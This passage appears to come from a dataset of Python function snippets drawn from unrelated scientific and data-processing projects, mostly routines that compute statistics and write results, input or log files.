i_out.write(string_utils.out_terminating + '\\t' + str(reduced_sample.terminate_all) + '\\t')\n i_out.write(string_utils.out_sleeping + '\\t' + str(reduced_sample.sleep_all) + '\\t')\n i_out.write(string_utils.out_crashing + '\\t' + str(reduced_sample.crash_all) + '\\t')\n i_out.write(string_utils.out_raising_error + '\\t' + str(reduced_sample.error_all) + '\\t')\n i_out.write(string_utils.out_writes_file + '\\t' + str(reduced_sample.write_file) + '\\n')\n\n # system calls count section\n s_out.write(string_utils.syscall_final + '\\t' + str(reduced_sample.total_syscalls) + '\\n')\n\n i_out.write('\\n')\n s_out.write('\\n')\n c_out.write('\\n')", "def generate_val_file(id_test,lines,columns):\n print(\"generate_val_file\")\n val_file_name=id_test+\".val\"\n f = io.open(INPUT_PARSER_RESULTS_DIR+val_file_name, \"w\",newline='\\n')\n inverse_count=0\n for line in range(0,lines):\n for column in range(0,columns):\n inverse_count=inverse_count-1\n print(\"(line,column)=(\"+str(line)+\",\"+str(column)+\")\")\n f.write(\"(\"+str(line)+\",\"+str(column)+\") = \"+str(inverse_count)+\"\\n\")\n f.close()", "def print_bm25_field_length_info(path_doc_length_info_bm25f):\n\n doc_length_info = load_pickle(path_doc_length_info_bm25f)\n \n n_terms_author_total = 0\n n_terms_sections_total = 0\n n_terms_title_total = 0\n n_terms_abstract_total = 0\n for cord_uid in doc_length_info.keys():\n \n info = doc_length_info[cord_uid]\n \n n_terms_author_total += info['author']\n n_terms_sections_total += info['sections']\n n_terms_title_total += info['title']\n n_terms_abstract_total += info['abstract']\n \n n_terms_total = n_terms_author_total + n_terms_sections_total + n_terms_title_total + n_terms_abstract_total\n \n print(len(doc_length_info))\n print(f\"n_terms_author_total = {n_terms_author_total}, average={n_terms_author_total/len(doc_length_info)}\")\n print(f\"n_terms_sections_total= {n_terms_sections_total}, average={n_terms_sections_total/len(doc_length_info)}\")\n print(f\"n_terms_title_total = {n_terms_title_total}, average={n_terms_title_total/len(doc_length_info)}\")\n print(f\"n_terms_abstract_total= {n_terms_abstract_total}, average={n_terms_abstract_total/len(doc_length_info)}\")\n print(f\"n_terms_total = {n_terms_total}, average={n_terms_total/len(doc_length_info)}\")", "def main():\n print \"\\nWelcome to the Bloom lab Reed-Muench calculator.\\n\"\n infile = None\n while not infile:\n infile = raw_input(\"Enter the name of the input file in text format: \").strip()\n if os.path.isfile(infile):\n break\n elif infile in ['Q', 'q']:\n print \"Quitting.\"\n sys.exit()\n else:\n infile = None\n print \"Failed to find the specified input file of %s. 
Try again to enter a valid file name, or enter Q to quit.\" % infile\n print \"Reading input from the file %s.\" % infile\n (samplenames, sampledata, volume, dilution) = ParseInput(infile)\n print \"Read data for %d samples.\" % len(sampledata)\n titers = {}\n for (sample, data) in sampledata.iteritems():\n titers[sample] = Titer(data, volume, dilution)\n print \"\\nHere are the computed titers in TCID50 per ul:\"\n for sample in samplenames:\n print \"%s: %.3f\" % (sample, titers[sample])\n (base, ext) = os.path.splitext(infile)\n outfile = '%s-titers.txt' % base\n print \"\\nNow we will write these titers to the output file %s.\" % outfile\n if AskOverwrite(outfile):\n f = open(outfile, 'w')\n f.write(\"Here are the computed titers in TCID50 per ul.\\n\")\n for sample in samplenames:\n f.write(\"%s:\\t%.3f\\n\" % (sample, titers[sample]))\n f.close()", "def main():\n if len(sys.argv) < 2:\n print('Usage: experiment_get_histogram <filename>')\n sys.exit(1)\n filename = sys.argv[1]\n\n block_sizes = [\n 128, # 128 B\n 512, # 512 B\n 1 * 2 ** 10, # 1 KiB\n 4 * 2 ** 10, # 4 KiB\n 8 * 2 ** 10, # 8 KiB\n 64 * 2 ** 10, # 64 KiB\n 128 * 2 ** 10, # 128 KiB\n 512 * 2 ** 10, # 512 KiB\n 1 * 2 ** 20, # 1 MiB\n 2 * 2 ** 20, # 2 MiB\n ]\n total_size = 100 * 2 ** 20 # 100 MiB\n\n if os.path.exists('./out'):\n shutil.rmtree('./out')\n os.mkdir('./out')\n csvwriter = csv.DictWriter(\n sys.stdout,\n fieldnames=('block_size', 'milliseconds_elapsed', 'total_size'),\n dialect='unix'\n )\n csvwriter.writeheader()\n for block_size in block_sizes:\n for i in range(50):\n ms_elapsed = get_histogram(\n filename,\n block_size,\n )\n csvwriter.writerow({\n 'block_size': block_size,\n 'milliseconds_elapsed': ms_elapsed,\n 'total_size': total_size,\n })", "def file_creator(title_list):\n for file_name in title_list: #title names are retrieved out of genID.txt\n with open (\"nuc_variant_calls/\"+file_name.strip()+\".var\",'w') as x:\n x.write(\"Feature type\\tAlignment length\\tIdentical nucleotides\\tIndel count\\n\") #Table headers.", "def splitFile(filename, n):\n in_file = open(filename)\n line = in_file.readline()\n count = 0\n while line <> \"\":\n if count < 10: num = \"0\"+str(count)\n else: num = str(count)\n f = open(\"output/\"+filename+\"-\"+num,\"w\")\n for i in range(n):\n if line == \"\": break\n f.write(line)\n line = in_file.readline()\n f.close()\n count += 1\n return count", "def results_to_file(samples, filename, during_analysis):\r\n\r\n results = []\r\n\r\n if hasattr(samples, \"log_evidence\"):\r\n if samples.log_evidence is not None:\r\n\r\n value = \"{:.8f}\".format(samples.log_evidence)\r\n results += [\r\n frm.add_whitespace(str0=\"Bayesian Evidence \", str1=value, whitespace=90)\r\n ]\r\n results += [\"\\n\"]\r\n\r\n value = \"{:.8f}\".format(max(samples.log_likelihoods))\r\n results += [\r\n frm.add_whitespace(str0=\"Maximum Likelihood \", str1=value, whitespace=90)\r\n ]\r\n results += [\"\\n\\n\"]\r\n\r\n results += [\"Maximum Log Likelihood Model:\\n\\n\"]\r\n\r\n formatter = frm.TextFormatter()\r\n\r\n for i, prior_path in enumerate(samples.model.unique_prior_paths):\r\n formatter.add(\r\n (prior_path, format_str().format(samples.max_log_likelihood_vector[i]))\r\n )\r\n results += [formatter.text + \"\\n\"]\r\n\r\n if hasattr(samples, \"pdf_converged\"):\r\n\r\n if samples.pdf_converged:\r\n\r\n results += samples_text.summary(samples=samples, sigma=3.0, indent=4, line_length=90)\r\n results += [\"\\n\"]\r\n results += samples_text.summary(samples=samples, sigma=1.0, indent=4, 
line_length=90)\r\n\r\n else:\r\n\r\n results += [\r\n \"\\n WARNING: The samples have not converged enough to compute a PDF and model errors. \\n \"\r\n \"The model below over estimates errors. \\n\\n\"\r\n ]\r\n results += samples_text.summary(samples=samples, sigma=1.0, indent=4, line_length=90)\r\n\r\n results += [\"\\n\\ninstances\\n\"]\r\n\r\n formatter = frm.TextFormatter()\r\n\r\n for t in samples.model.path_float_tuples:\r\n formatter.add(t)\r\n\r\n results += [\"\\n\" + formatter.text]\r\n\r\n frm.output_list_of_strings_to_file(file=filename, list_of_strings=results)", "def make(input_filepath, output_filepath) -> None:\n logger = logging.getLogger(__name__)\n logger.info('making final data set from raw data')", "def generate(inputFilename, outputFilename = defaultFileName, \n sizeOfReducedSample = DEFSIZEOFREDUCEDSAMPLE, \n centerEta = DEFCENTERETA, centerPhi = DEFCENTERPHI): \n listOfSignals = convert(inputFilename)\n arrayOfSignals = np.array(listOfSignals)\n arrayOfSignals.shape\n np.save(outputFilename, arrayOfSignals, allow_pickle=False)\n print(\"npy array name: \",outputFilename)", "def process_file(input_file = 'NC_012655.ffn',output_file = 'NC_012655.output'):\n #prepare\n f = open(input_file, 'r')\n o = open(output_file,'w')\n seq = ''\n header = f.readline()\n o.write('GeneID Length GC \\n')\n #work\n for line in f:\n if not line.startswith('>'):\n seq += line\n else:\n o.write(process_gene(header = header, gene = seq))\n header = line\n seq = ''\n #finish\n f.close()\n o.close()\n return 0", "def test_madlib_file_write():\n madlib(input_values)\n file_text = ''\n with open('assets/updated_madlib_text', 'r') as file:\n for line in file:\n file_text += line\n assert file_text == output_text", "def main():\r\n N = 200 # number of samples\r\n port_name = 'COM4' # serial port name\r\n port_speed = 19200 # serial port speed/ baudrate (bits per second)\r\n \r\n t,percent = get_data(N,port_name,port_speed) # get data\r\n file_write(t,percent) # write data to file\r", "def generate_statistics():\n\n with open('final_library.csv') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n next(csv_reader)\n library=[]\n smiles=[]\n for row in csv_reader:\n library.append(row[0])\n smiles.append(row[1])\n #print(library)\n\n #print(smiles)\n\n building_blocks=[]\n for bb in library:\n building_blocks.append(bb.split('-'))\n #print(building_blocks)\n number_of_building_blocks=[]\n for block in building_blocks:\n number_of_building_blocks.append(dict(Counter(block)))\n\n df=pd.DataFrame(number_of_building_blocks,index=smiles)\n df.fillna(0,inplace= True)\n df['Total building blocks'] = df.sum(axis=1, numeric_only=True)\n pd.set_option('display.max_colwidth', -1)\n #print(df)\n df.to_excel(\"statistics.xlsx\")", "def generate_headerfile(template, n_division=10000, df=6, start_chi=25, filepath=\"Chi2PLookup.h\", verbose=False):\n divisor = \"const int Chi2PLookup::divisor = {};\".format(n_division)\n\n names = []\n cutoff = []\n p_values_arrays = []\n degrees_of_freedom = range(1, df+1)\n\n if verbose:\n print(\"Generating p-value arrays...\")\n print(\" df={}\".format(df))\n print(\" precision={}\".format(n_division))\n\n for df in degrees_of_freedom:\n var_name = \"pValues_{}\".format(df)\n names.append(var_name)\n max_chi = max_chi_value(df=df, start_chi=start_chi)\n cutoff.append(max_chi)\n n_elements = max_chi * n_division\n\n chi_values = (val / n_division for val in range(0, n_elements + 1))\n p_values = (str(1 - chi2.cdf(val, df)) for val in chi_values)\n\n if 
verbose:\n print(\"\\tAdding p-values array to template for degree of freedom = {} ...\".format(df))\n\n p_values_arrays.append(\"double {}[] = {{{}}};\".format(var_name, \", \".join(p_values)))\n\n cutoff_array = \"const int Chi2PLookup::cutoff[] = {{{}}};\".format(\", \".join([str(i) for i in cutoff]))\n p_values_array_of_arrays = \"const double * Chi2PLookup::pValues[] = {{{}}};\\n\".format(\", \".join(names))\n\n template = template.format(divisor, cutoff_array, \"\\n\".join(p_values_arrays), p_values_array_of_arrays)\n\n if verbose:\n print(\"Saving file to: {}\".format(os.path.abspath(filepath)))\n\n with open(filepath, \"w\") as outfile:\n outfile.write(template)\n\n return template", "def produce_output_txt(self):\n\n NAME = \"TODO get name form cpacs object\"\n\n result_dir = get_results_directory(\"WeightConventional\")\n\n output_file = Path(result_dir, \"Aircraft_Geometry.out\")\n\n OutputTextFile = open(output_file, \"w\")\n\n OutputTextFile.write(\"\\n#################################################\")\n OutputTextFile.write(\"\\n###### AIRCRAFT GEOMETRY EVALUATION MODULE ######\")\n OutputTextFile.write(\"\\n###### OUTPUTS ######\")\n OutputTextFile.write(\"\\n#################################################\")\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(\"\\nAircraft: \" + NAME)\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(\"\\nGeometry Evaluations-----------------------------\")\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(\"\\nUSEFUL INFO -------------------------------------\")\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(\n \"\\nIf fuselage or wing number is greater than 1 the\\n\"\n \"information of each obj are listed in an \"\n \"array ordered\\nprogressively\"\n )\n OutputTextFile.write(\n \"\\nSymmetry output: 0 = no symmetry, 1 = x-y,\\n\" + \"2 = x-z, 3 = y-z planes\"\n )\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(\"\\nRESULTS -----------------------------------------\")\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(\"\\nFUSELAGE ----------------------------------------\")\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(f\"\\nNumber of fuselage sections [-]: {self.fuse_sec_nb}\")\n OutputTextFile.write(f\"\\nNumber of fuselage segments [-]: {self.fuse_seg_nb}\")\n OutputTextFile.write(f\"\\nCabin segments array [-]: {self.cabin_seg}\")\n OutputTextFile.write(f\"\\nFuse Length [m]: {np.around(self.fuse_length, 5)}\")\n OutputTextFile.write(f\"\\nFuse nose Length [m]: {np.around(self.fuse_nose_length, 5)}\")\n OutputTextFile.write(f\"\\nFuse cabin Length [m]: {np.around(self.fuse_cabin_length, 5)}\")\n OutputTextFile.write(f\"\\nFuse tail Length [m]: {np.around(self.fuse_tail_length, 5)}\")\n OutputTextFile.write(f\"\\nAircraft Length [m]: {np.around(self.tot_length, 5)}\")\n OutputTextFile.write(\n \"\\nCircumference of each section of the fuselage [m]:\"\n f\"\\n{np.around(self.fuse_sec_circ, 5)}\"\n )\n OutputTextFile.write(\n \"\\nRelative distance of each section of the\"\n + \"fuselage, respect to the first one [m]: \\n\"\n + str(np.around(self.fuse_sec_rel_dist, 5))\n )\n 
OutputTextFile.write(\n \"\\nLength of each segment of the fuselage [m]: \\n\"\n + str(np.around(self.fuse_seg_length, 5))\n )\n OutputTextFile.write(\n \"\\nMean fuselage width [m]: \" + str(np.around(self.fuse_mean_width, 5))\n )\n OutputTextFile.write(\n \"\\nWidth of each section of the fuselage [m]: \\n\"\n + str(np.around(self.fuse_sec_width, 5))\n )\n OutputTextFile.write(\n \"\\nVolume of each segment of the fuselage \"\n \"[m^3]: \\n\" + str(np.around(self.fuse_seg_vol, 5))\n )\n OutputTextFile.write(\n \"\\nVolume of the cabin [m^3]: \" + str(np.around(self.fuse_cabin_vol, 5))\n )\n OutputTextFile.write(\"\\nVolume of the fuselage [m^3]: \" + str(np.around(self.fuse_vol, 5)))\n OutputTextFile.write(\"\\n\")\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(\"\\nWINGS -------------------------------------------\")\n OutputTextFile.write(\"\\n-------------------------------------------------\")\n OutputTextFile.write(f\"\\nNumber of Wings [-]: {self.wing_nb}\")\n OutputTextFile.write(f\"\\nWing symmetry plane [-]: {self.wing_sym}\")\n OutputTextFile.write(f\"\\nNumber of wing sections [-]: {self.wing_sec_nb}\")\n OutputTextFile.write(f\"\\nNumber of wing segments [-]: {self.wing_seg_nb}\")\n OutputTextFile.write(f\"\\nWing Span [m]: \\n{np.around(self.wing_span, 5)}\")\n OutputTextFile.write(\n \"\\nWing MAC length [m]: \\n\"\n + str(\n np.around(\n self.wing_mac[\n 0,\n ],\n 5,\n )\n )\n )\n OutputTextFile.write(\n \"\\nWing MAC x,y,z coordinate [m]: \\n\"\n + str(\n np.around(\n self.wing_mac[\n 1:4,\n ],\n 5,\n )\n )\n )\n OutputTextFile.write(\n \"\\nWings sections thickness [m]: \\n\" + str(np.around(self.wing_sec_thickness, 5))\n )\n OutputTextFile.write(\n \"\\nWings sections mean thickness [m]: \\n\" + str(np.around(self.wing_sec_mean_thick, 5))\n )\n OutputTextFile.write(\n \"\\nWing segments length [m]: \\n\" + str(np.around(self.wing_seg_length, 5))\n )\n OutputTextFile.write(\n \"\\nWing max chord length [m]: \\n\" + str(np.around(self.wing_max_chord, 5))\n )\n OutputTextFile.write(\n \"\\nWing min chord length [m]: \\n\" + str(np.around(self.wing_min_chord, 5))\n )\n OutputTextFile.write(\n \"\\nWings planform area [m^2]: \\n\" + str(np.around(self.wing_plt_area, 5))\n )\n OutputTextFile.write(\n \"\\nMain wing planform area [m^2]: \" + str(np.around(self.wing_plt_area_main, 5))\n )\n OutputTextFile.write(\"\\nVolume of each wing [m^3]: \\n\" + str(np.around(self.wing_vol, 5)))\n OutputTextFile.write(\"\\nTotal wing volume [m^3]: \" + str(np.around(self.wing_tot_vol, 5)))\n OutputTextFile.write(\"\\nWing volume for fuel storage [m^3]: \" + str(self.wing_fuel_vol))\n\n # Close Text File\n OutputTextFile.close()", "def generate_file_ending(k_out, sphere_radius):\n kout = f'{k_out:.3f}'\n spr_rad = f'{sphere_radius:.3f}'\n\n current_string = \"kout_\" + kout + \"_\" + \"spr_rad_\" + spr_rad\n return current_string", "def write_file_simple(self,filename):\n\n output = open(filename,\"w\")\n # write header\n output.write(\"# %1s %3s %22s %6s %22s\\n\"%(\"l\",\"n\",\"nu_theo (muHz)\",\"unused\",\"Inertia\"))\n for i in range(self.modes.shape[0]):\n output.write(\" %1d %3d %22.15e 0.0 %22.15e\\n\"%( \\\n self.modes[\"l\"][i], \\\n self.modes[\"n\"][i], \\\n self.modes[\"freq\"][i]*self.glb[ifreq_ref], \\\n self.modes[\"inertia\"][i]))\n output.close()", "def makeWeights(_files,treeName,category,_outputFile, BINS, PT, ETA):\n\tROOT.gROOT.SetBatch(1)\n\n\t#treeName = 'histoMuFromTk/fitter_tree'\n\t_trees = dict( [ ( name, 
_file.Get(treeName) ) for name,_file in _files.iteritems()] )\n\t#Check if in both files are the tree\n\tfor _tree in _trees.itervalues():\n\t\tif not _tree:\n\t\t\treturn None\n\t\n\thistos = {}\n\tweights = {}\n\n\t#-- The ':' token in A:B read as 'B conditioned to A' (look this unregular order)\n\t#-- The categories are datamembers which can be 1 or 0, a condition;\n\t#-- if we want to weight the pt-distribution of all probes for the L1Mu3 trigger\n\t#-- category, we must decided with respect which muonID category (Glb, TMLSAT, ...), then\n\t#-- reduce to a subset which the muonID category == 1 and calculate the weight of the\n\t#-- pt-distribution\n\t#-- The category variable can be A:B:C:..., the last one is the only one which we don't \n\t#-- want to reduce (see find category)\n\tcondCategory = ''\n\tstoreCategory = 'weight'\n\tif category.find(':') != -1:\n\t\t_catList = category.split(':')\n\t\t#-- This for is to include the quality cuts and other possible categories\n\t\tfor i in xrange(len(_catList)-1):\n\t\t\tcondCategory += ' && '+_catList[i]+' == 1 '# BUG------> && '+triggerCat+' == 1' \n\t\t\tstoreCategory += '_'+_catList[i]\n\n\tinstName = lambda k,pt : PT+'>>h_'+category+name+str(k)+'(50,'+str(pt[0])+','+str(pt[1])+')'\n\tcuts = lambda pt,eta: PT+' >= '+str(pt[0])+' && '+PT+' <'+str(pt[1])+\\\n\t\t\t' && '+ETA+' >= '+str(eta[0])+' && '+ETA+' < '+str(eta[1])+condCategory\n\t#print cuts #--------------------------> PROVISONAL: PARECE QUE SE RECUPERAN LOS ESPECTROS DE LOS PASSING\n\t #--------------------------> NO DE LOS ALL\n\tk = 0\n\tfor i in xrange(len(BINS.__getattribute__(PT))-1):\n\t\tpt = (BINS.__getattribute__(PT)[i],BINS.__getattribute__(PT)[i+1])\n\t\tfor j in xrange(len(BINS.__getattribute__(ETA))-1):\n\t\t\teta = (BINS.__getattribute__(ETA)[j],BINS.__getattribute__(ETA)[j+1])\n\t\t\tfor name,_t in _trees.iteritems(): \n\t\t\t\tN = _t.Draw( instName(k,pt),cuts(pt,eta) )\n\t\t\t\thistos[name] = ROOT.gDirectory.Get('h_'+category+name+str(k))\n\t\t\tprint ' \\033[1;34mDoing bin'+str(k)+' '+PT+'=('+str(pt[0])+','+str(pt[1])+') '+ETA+'=('+str(eta[0])+','+str(eta[1])+')\\033[1;m'\n\t\t\tswap = histos['numerator'].Clone(category+'_bin'+str(k))\n\t\t\tdummy = swap.Divide(histos['denominator'])\n\t\t\tweights[category+'_bin'+str(k)] =( (eta[0],eta[1]), (pt[0],pt[1]), ROOT.gDirectory.Get(category+'_bin'+str(k)) )\n\t\t\t#Acura els limits\n\t\t\tweights[category+'_bin'+str(k)][2].GetXaxis().SetLimits( pt[0], pt[1] ) \n\t\t\t#weights[category+'_bin'+str(k)][2].SetNormFactor(1) \n\t\t\tk += 1\n\t_out = ROOT.TFile(_outputFile,'RECREATE')\n\tfor name,(etaBins,ptBins,histo) in weights.iteritems():\n\t\thisto.Write()\n\t_out.Close()\t\n\treturn weights", "def countDataSize(self,filename):\n \n try:\n d = h5py.File(filename,'r')\n except:\n print(filename)\n return \n\n N = 0\n scan_edges = d['level2/Statistics/scan_edges'][:]\n for (start,end) in scan_edges:\n N += (end-start)//self.offsetLen * self.offsetLen\n d.close()\n\n N = N*self.Nfeeds\n\n self.chunks += [[int(self.Nsamples), int(self.Nsamples+N)]]\n self.datasizes += [int(N/self.Nfeeds)]\n self.Nsamples += int(N)", "def write_lengths(gene_data, exon_data, out_file):\n ofunc = get_open_function(out_file)\n with ofunc(out_file, 'wt') as o:\n o.write('gene_id\\tgene_type\\taggregate_length\\n')\n for gene in sorted(exon_data):\n gtype = gene_data[gene]\n data = []\n for exon in exon_data[gene]:\n data.extend(range(exon[0], exon[1] + 1))\n o.write('{0}\\t{1}\\t{2}\\n'.format(gene, gtype, len(set(data))))", "def main():\n\n\t# 
eesAmplitudes = range(200,321,10)\n\teesAmplitudes = [\"%\"+\"%.2f_0_0\"%(i) for i in np.arange(0,1.01,.05)]\n\t# eesFrequencies = range(10,1001,20)\n\teesFrequencies = np.logspace(1,3,50)\n\t# nrnStructureFile = \"fsSFrFfMnArtMod.txt\"\n\t# nrnStructureFile = \"fsSFrFfMnArtModHuman.txt\"\n\tnrnStructureFile = \"fsMnArtModHuman.txt\"\n\t# name = \"FreqAmpModHuman_0367S\"\n\tname = \"FreqAmpModHuman_ArtmodHuman_10msBurst\"\n\n\tnSim = len(eesFrequencies)*len(eesAmplitudes)\n\tcount=0.\n\tpercLastPrint=0.\n\tprintPeriod = 0.05\n\t# simTime = 250\n\tsimTime = 15\n\tspecies = \"human\"\n\n\tfor eesAmplitude in eesAmplitudes:\n\t\tfor eesFrequency in eesFrequencies:\n\t\t\tfilName = name+\"_amp_\"+str(eesAmplitude)+\"_freq_\"+str(eesFrequency)\n\t\t\tresultFile = gt.find(\"*\"+filName+\".p\",pathToResults)\n\t\t\tif not resultFile:\n\t\t\t\treturnCode = None\n\t\t\t\twhile not returnCode==0:\n\t\t\t\t\tprogram = ['python','scripts/computeAfferentsEfferentsModulation.py',\n\t\t\t\t\t\tstr(eesFrequency),str(eesAmplitude),species,nrnStructureFile,name,\"--simTime\",str(simTime)]\n\t\t\t\t\tprint \" \".join(program)\n\t\t\t\t\tforwardSimulation = subprocess.Popen(program, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\t\t\t\t\treturnCode = None\n\t\t\t\t\twhile returnCode is None:\n\t\t\t\t\t\tmessage = forwardSimulation.stdout.readline().rstrip(\"\\n\").split()\n\t\t\t\t\t\tif message != None:print \"\\t\\t\"+\" \".join(message)+\"\\t\\t\"\n\t\t\t\t\t\treturnCode = forwardSimulation.poll()\n\t\t\t\t\tif returnCode != 0: print \"\\t\\t\\t\\t Error n: \",forwardSimulation.poll(),\" resetting simulation...\"\n\t\t\tcount+=1\n\t\t\tif count/nSim-percLastPrint>=printPeriod:\n\t\t\t\tpercLastPrint=count/nSim\n\t\t\t\tprint str(round(count/nSim*100))+\"% of simulations performed...\"\n\tplot_stats(eesAmplitudes,eesFrequencies,simTime,name)", "def estimate_num_spill_files(num_words, key_num_bytes, value_num_bytes, mapreduce_task_io_sort_mb, mapreduce_map_sort_spill_percent):\n # extra bytes added when each (k,v) pair is added to output buffer\n KEY_VALUE_META_DATA_NUM_BYTES = 16\n\n key_len_num_bytes = zero_compress.size_of_zero_compressed_int64(key_num_bytes)\n value_len_num_bytes = zero_compress.size_of_zero_compressed_int64(value_num_bytes)\n\n return math.ceil((num_words * (KEY_VALUE_META_DATA_NUM_BYTES + key_len_num_bytes + key_num_bytes + value_len_num_bytes + value_num_bytes)) /\n (util.MiB_to_bytes(mapreduce_task_io_sort_mb) * mapreduce_map_sort_spill_percent))", "def _create_sparsed_file(self, nms, path, size):\n nms.appliance.execute(\n 'truncate --size %(size)dG %(path)s' % {\n 'path': path,\n 'size': size\n }\n )", "def store_regain_values(filename,gain_vals,gain_comment=\"\"):\n f = open(filename,\"w\")\n f.write(\"#Gain values calculated by Echidna reduction routine\\n\")\n f.write(\"#\"+gain_comment+\"\\n\")\n for pos,gain in zip(range(len(gain_vals)),gain_vals):\n f.write(\"%d %8.3f\\n\" % (pos,gain))\n f.close()", "def create_binning_file(bin_size,n_bins,lmax=None, file_name=None):\n bins = np.arange(n_bins)\n bin_low = bins * bin_size + 2\n bin_hi = (bins + 1) * bin_size + 1\n bin_cent = (bin_low + bin_hi) / 2\n \n if lmax is not None:\n id = np.where(bin_hi <lmax)\n bin_lo,bin_hi,bin_c=bin_lo[id],bin_hi[id],bin_c[id]\n\n if file_name is None:\n return bin_low, bin_hi, bin_cent\n else:\n f = open('%s'%file_name,mode=\"w\")\n for i in range(n_bins):\n f.write(\"%0.2f %0.2f %0.2f\\n\"%(bin_low[i],bin_hi[i],bin_cent[i]))\n f.close()", "def 
write_input_file(y,z,fname):\n file = open('c:/4nec2/out/' + fname + '.nec', 'w')\n file.write('CM Seeddesign \\n')\n file.write('CM Zigzag Antenna \\n')\n file.write('CE File generated by python \\n')\n seg = 1\n\n #write the antenna\n for i in range(0,len(y)-1):\n file.write('GW %3i %3i %8.4f %8.4f %8.4f %8.4f %8.4f %8.4f %8.4f\\n' % (1,seg,0,y[i],z[i],0,y[i+1],z[i+1],1))\n\n file.write('GE 0 \\n')\n file.write('EK \\n')\n file.write('EX %3i %3i %3i %3i %3i %3i %3i\\n' % (0,1,1,1,1,0,0))\n file.write('GN -1 \\n')\n \n file.write('FR %3i %3i %3i %3i %8.4f %8.4f\\n' % (0,1,0,0,900,0))\n file.write('FR %3i %3i %3i %3i %8.4f %8.4f\\n' % (0,11,0,0,850,10))\n\n file.write('LD %3i %3i %3i %3i %8.4f %8.4f\\n' % (5,1,0,0,58000000,2))\n file.write('RP %3i %3i %3i %3i %8.4f %8.4f %8.4f %8.4f\\n' % (0,1,1,1000,90,0,0,0))\n\n file.write('EN \\n')\n file.close()", "def exp_calculator_with_count(count_table_file):\n count_table = pd.read_table(count_table_file, index_col=0)\n columns = count_table.columns\n\n gene_len = count_table[columns[0]]\n rpkm_dict = dict()\n tpm_dict = dict()\n for sample in columns[1:]:\n # Divide the read counts by the length of each gene in kilobases.\n # This gives you reads per kilobase (RPK)\n rpk = count_table[sample]/gene_len\n # get rpkm/fpkm\n total_counts = sum(count_table[sample])/1000\n \"\"\"\n rpkm = (count_table[sample]/gene_len)/(sum(count_table[sample])/1000)*1000000\n \"\"\"\n rpkm = rpk/total_counts*1000000\n # get tpm\n norm_gene_len_total_counts = sum(rpk)\n tpm = rpk/norm_gene_len_total_counts*1000000\n \"\"\"\n tpm = (count_table[sample]/gene_len)/sum(count_table[sample]/gene_len)*1000000\n \"\"\"\n # save\n rpkm_dict[sample] = rpkm\n tpm_dict[sample] = tpm\n # save results\n df_rpkm = pd.DataFrame(rpkm_dict, index=count_table.index)\n df_tpm = pd.DataFrame(tpm_dict, index=count_table.index)\n df_rpkm.to_csv(count_table_file+'.fpkm.xls', sep='\\t')\n df_tpm.to_csv(count_table_file+'.tpm.xls', sep='\\t')\n #\n return rpkm_dict, tpm_dict", "def main(input_filepath, output_filepath):\n productsDict = dataToDict(input_filepath)\n productsList = dictToCSV(productsDict)\n toCSV(productsList, output_filepath)\n\n logger = logging.getLogger(__name__)\n logger.info('making final data set from raw data')", "def file_write(t,percent): \r\n \r\n file_name = \"EP305data56.txt\"\r\n \r\n # Open a file for writing\r\n out_file = open(file_name, 'w')\r\n \r\n # print headers\r\n print('{0:<10}'.format('Time(s)'),\\\r\n '{0:<10}'.format('Output (%)'), file = out_file)\r\n \r\n # Write the values to the file\r\n #(fixed decimal point notation with 5 decimal places)\r\n for i in range (len(percent)):\r\n print('{0:<10.5f}'.format(t[i]),\\\r\n '{0:<10.5f}'.format(percent[i]), file = out_file)\r\n \r\n # Close the file\r\n out_file.close()", "def fog_file_writer(data, location, count):\n\n data.to_csv(location.format(str(count % 2000) + '.txt'))\n count += 1\n\n return count", "def whriteInOuput(finalOutput):\n\n os.chdir(\"D:/IIHT/Python/Project/NRPT all companies scrapper/caches\")\n #open text file, return an object of type io.TextIOWrapper\n with open(\"Companies Website.txt\", \"w\") as writ:\n #write each line in the object op, return an object of type int\n writ.write('\\n'.join(finalOutput) + \"\\n\")", "def create_export_files(n,input_choice,timing,min_hull_per):\n\n\n\texists = os.path.isdir('analysis')\n\tif exists:\n\t\tf = open('analysis/results.csv','a',newline='')\n\t\tresults = csv.writer(f)\n\telse:\n\t\tos.mkdir('analysis')\n\t\tf = 
open('analysis/results.csv','w',newline='')\n\t\tresults = csv.writer(f)\n\t\tresults.writerow(['Algo','Size of Input','Min. Hull Pts Per','Type of Input','Timing'])\n\n\n\tresults.writerow(['Graham Scan',n,min_hull_per,input_choice,timing])", "def create_files(tweets_input, ft1_output, ft2_output):\n # create all possible words for input file\n all_words = word_generator()\n\n word_counts = defaultdict(int)\n median_counter = Counter({k: 0 for k in range(1, MAX_LINE_SIZE + 1)})\n\n with open(tweets_input, 'w') as tweets_file:\n with open(ft2_output, 'w') as medians_file:\n for n_lines in range(1, NUM_LINES + 1):\n\n # add a tweet line to input/test file\n line_size = random.randint(MIN_LINE_SIZE, MAX_LINE_SIZE)\n words = [random.choice(all_words) for _ in range(line_size)]\n tweet = ' '.join(words)\n tweets_file.write(tweet + \"\\n\")\n\n # Feature 1 testing: Keep a count of words added to test file\n for word in words:\n word_counts[word] += 1\n\n # Feature 2 testing: compute new median via histogram method and write to file\n median_counter[len(set(words))] += 1\n medians_file.write('{0:.1f}\\n'.format(get_median(median_counter, n_lines)))\n\n # Feature 1: write word counts to file\n with open(ft1_output, 'w') as word_counts_file:\n for word, count in sorted(word_counts.items(), key=operator.itemgetter(0)):\n word_counts_file.write('{0} {1}\\n'.format(word.ljust(WORD_SIZE), str(count)))", "def output(results):\n\n text_file = open(\"problem_1_B_output.txt\", \"w\")\n\n out = \"\"\n\n for i, line in enumerate(results):\n\n string = \"Sample {}: {}, posterior probability of {:.4f}\".format(i + 1,\n line[0],\n line[1])\n\n out += (string + \"\\n\")\n\n text_file.write(out)\n\n text_file.close()", "def postprocess_cga(lines, outfile):\n pattern = re.compile(\"^\\s*([0-9,]+)\\s+\\([ 